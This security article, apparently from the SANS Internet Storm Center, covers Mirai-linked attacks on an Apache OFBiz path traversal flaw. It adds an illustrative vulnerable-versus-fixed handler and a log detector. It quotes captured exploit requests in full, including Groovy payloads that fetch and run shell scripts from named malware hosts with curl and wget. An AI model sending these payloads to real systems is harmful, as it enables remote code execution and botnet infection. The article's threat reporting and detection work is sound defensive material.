Enterprise resource planning (ERP) software is at the heart of many businesses, supporting HR, accounting, shipping and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make them difficult to patch. Yet critical vulnerabilities continue to affect these systems and put critical business data at risk.
SANS Internet Storm Center published a report showing how the open source ERP platform OFBiz is currently the target of new strains of the Mirai botnet.
As part of its broad portfolio of projects, the Apache Foundation supports OFBiz, a Java-based platform for building ERP (Enterprise Resource Planning) applications. OFBiz appears to be much less common than commercial alternatives. However, like any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.
In May of this year, a critical security update was released for OFBiz. The update fixed a directory traversal vulnerability that could lead to remote command execution. Versions of OFBiz prior to 12/18/13 were affected. A few weeks later, details about the vulnerability were published.
Directory traversal or path traversal vulnerabilities can be used to bypass access control rules. For example, if a user can access the “/public” directory but not the “/admin” directory, an attacker could use a URL like “/public/../admin” to bypass the access control logic. Recently CISA and the FBI issued an alert as part of the Secure by Design initiative, which focuses on directory traversal. CISA noted that it currently tracks 55 directory traversal vulnerabilities in its Known Exploited Vulnerabilities (KEV) catalog.
For OFBiz, the directory traversal is easily triggered by inserting a semicolon. All an attacker needs is a URL they can access, to which they append a semicolon followed by the restricted URL. The URL of the exploit we are currently seeing is:
/webtools/control/forgotPassword;/ProgramExport
Since users should be able to recover passwords without first logging in, “forgotPassword” does not require any authentication. “ProgramExport”, on the other hand, should be access controlled and not reachable unless the user is logged in. “ProgramExport” is particularly dangerous because it allows arbitrary code execution. Incorrect logic in OFBiz stopped evaluating the URL after the semicolon. This allowed any user, without logging in, to reach the second part of the URL, “/ProgramExport”.
An attacker must use a POST request to exploit the vulnerability, but does not necessarily need a request body. Instead, a URL parameter works just as well.
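The following Python model, added here as an illustration and not taken from OFBiz's own source, shows the shape of the flaw the article describes and the defensive fix: the vulnerable handler makes its access decision on the part of the URL before the first semicolon but dispatches on the last path segment, while the hardened handler canonicalizes the path (query string dropped, percent-decoding, `;param` path parameters stripped from every segment, `..` resolved) and then authorizes and dispatches on the same name. The request names, the public/restricted split and the handler functions are hypothetical stand-ins for a real controller map.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Constructed stand-in for an application's controller map (hypothetical, not
# OFBiz's own): request names reachable anonymously, and names that need a session.
PUBLIC_REQUESTS = {"forgotPassword", "login"}
RESTRICTED_REQUESTS = {"ProgramExport"}


def canonical_path(raw_uri: str) -> str:
    """Drop the query string, percent-decode, strip ';param' path parameters from
    every segment and resolve '.' / '..' so that authorization and dispatch agree."""
    path = unquote(urlsplit(raw_uri).path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def handle_vulnerable(raw_uri: str, logged_in: bool) -> str:
    """Model of the flawed pattern: the access check stops reading the URL at the
    first ';', but dispatch resolves the final segment of the whole path."""
    path = urlsplit(raw_uri).path
    auth_name = path.split(";", 1)[0].rsplit("/", 1)[-1]   # what the check sees
    if auth_name in RESTRICTED_REQUESTS and not logged_in:
        return "denied"
    target = path.rsplit("/", 1)[-1]                         # what actually runs
    return f"executed:{target}"


def handle_hardened(raw_uri: str, logged_in: bool) -> str:
    """Canonicalize first, then authorize and dispatch on one and the same name."""
    target = canonical_path(raw_uri).rsplit("/", 1)[-1]
    if target not in PUBLIC_REQUESTS | RESTRICTED_REQUESTS:
        return "not-found"
    if target in RESTRICTED_REQUESTS and not logged_in:
        return "denied"
    return f"executed:{target}"


if __name__ == "__main__":
    # Constructed request lines: the page's semicolon URL, a classic '..' form,
    # a percent-encoded semicolon, and a legitimate ';jsessionid' path parameter.
    samples = [
        "/webtools/control/forgotPassword;/ProgramExport",
        "/webtools/control/forgotPassword;/ProgramExport?groovyProgram=x",
        "/webtools/control/forgotPassword/../ProgramExport",
        "/webtools/control/forgotPassword%3B/ProgramExport",
        "/webtools/control/login;jsessionid=ABC123",
        "/webtools/control/forgotPassword",
    ]
    for uri in samples:
        print(f"{uri:<60} vulnerable={handle_vulnerable(uri, False):<24}"
              f"hardened={handle_hardened(uri, False)}")
```

The point of the hardened version is not the semicolon specifically: any normalization that the dispatcher performs (path parameters, percent-decoding, dot segments) must be applied before the authorization decision, and the decision must be made on exactly the name that will be executed. Legitimate uses of path parameters such as `;jsessionid=` keep working because the canonical target is still the public request name.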
The SANS Internet Storm Center uses a wide network of honeypots to detect attempts to exploit a broad range of web application vulnerabilities. Significant new exploit attempts are described in the “First Seen” report. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the OFBiz directory traversal vulnerability mentioned above, which was immediately spotted in the First Seen report.
The exploit attempts originated from two different IP addresses, which were also linked to attempts to exploit IoT devices, activity commonly associated with modern variants of the “Mirai” botnet.
Attackers used two variants of the exploit. The first placed the command the exploit was supposed to execute in the URL:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
The second placed the command in the request body, which is the more common form for “POST” requests:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (victim IP address)
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Unfortunately, neither the “bin.sh” script nor the “sh” script could be recovered. The IP addresses were involved in a July 29 scan using the “KrebsOnSecurity” user agent, a nod to security journalist Brian Krebs. However, the URLs scanned were mostly parasitic, looking for existing web shells left behind by previous attacks. The IP address was also used to distribute a file called “botx.arm”. This filename is often associated with Mirai variants.
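Both variants share one observable in a plain web server access log: the request line contains a semicolon path parameter that resolves to a restricted request name, and the first variant additionally carries the `groovyProgram` parameter in the query string. The detection below is an added example written for this article, not ISC or OFBiz code; it parses Common Log Format lines (constructed sample lines with TEST-NET addresses and a redacted payload), canonicalizes the path the way a fixed dispatcher would, and flags only requests where a watched request name is reached through a path parameter or `..` segment, or where a watched parameter appears in the query string. The watch lists are assumptions; only `ProgramExport` and `groovyProgram` come from the page.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request names that must never be reached through a path-parameter or traversal
# trick. 'ProgramExport' is from the article; extend the set for your deployment.
WATCHED_REQUESTS = {"ProgramExport"}
# Query parameters whose presence in a request line indicates a code-execution attempt.
WATCHED_PARAMS = {"groovyProgram"}

# Common Log Format: ip ident user [ts] "METHOD uri PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic): two exploit shapes from the article,
# two benign requests, and one legitimate ';jsessionid' path parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Aug/2024:10:21:07 +0000] "POST /webtools/control/forgotPassword;'
    '/ProgramExport?groovyProgram=%5Bredacted%5D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [03/Aug/2024:10:24:51 +0000] "POST /webtools/control/forgotPassword;'
    '/ProgramExport HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Aug/2024:10:30:02 +0000] "GET /webtools/control/forgotPassword '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [03/Aug/2024:10:31:15 +0000] "POST /webtools/control/login;'
    'jsessionid=ABC123 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [03/Aug/2024:10:35:40 +0000] "POST /webtools/control/ProgramExport '
    'HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def canonical_path(raw_uri: str) -> str:
    """Query string dropped, percent-decoded, ';param' stripped per segment, dots resolved."""
    path = unquote(urlsplit(raw_uri).path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def analyze_line(line: str):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    raw_path = unquote(urlsplit(uri).path)
    reasons = []
    target = canonical_path(uri).rsplit("/", 1)[-1]
    # A direct, authenticated call to a restricted request is normal; only the
    # indirection (path parameter or dot segment) in front of it is suspicious.
    if target in WATCHED_REQUESTS and (";" in raw_path or ".." in raw_path):
        reasons.append(f"restricted request {target} reached via path parameter or traversal")
    hits = WATCHED_PARAMS & parse_qs(urlsplit(uri).query).keys()
    if hits:
        reasons.append("code-execution parameter in query string: " + ", ".join(sorted(hits)))
    if not reasons:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "uri": uri, "reasons": reasons}


def scan_log(lines):
    """Run analyze_line over an iterable of log lines and keep the findings."""
    return [f for f in map(analyze_line, lines) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["method"], finding["uri"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The second exploit shape keeps the payload in the POST body, which an access log never records, so the path-based rule is what catches it there; seeing the `groovyProgram` body parameter itself requires request-body logging at a reverse proxy or WAF. The `;jsessionid=` line is deliberately left unflagged, since path parameters are legitimate in servlet applications and alerting on every semicolon would drown the signal.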
After the vulnerability announcement in May, we expected to see some scans taking advantage of the OFBiz vulnerability. The exploit is straightforward, and while the vulnerable and exposed population is small, that hasn’t stopped attackers in the past. Now they are at least experimenting with it and may be adding the vulnerability to bots such as the Mirai variants.
Only a few IP addresses are involved:
- 95.214.27.196: Sending an exploit as a URL parameter and hosting malware.
- 83.222.191.62: Sending the exploit in the request body. Malware located at 185.196.10.231. Earlier in July, this IP was seen scanning for IoT vulnerabilities.
- 185.196.10.231: Hosting malware.
If you found this article interesting and want to dive deeper into the world of web application, API, and microservices security, you can join me at Network Security 2024 (September 4-9) for my course, SEC522. See everything in store at the event here.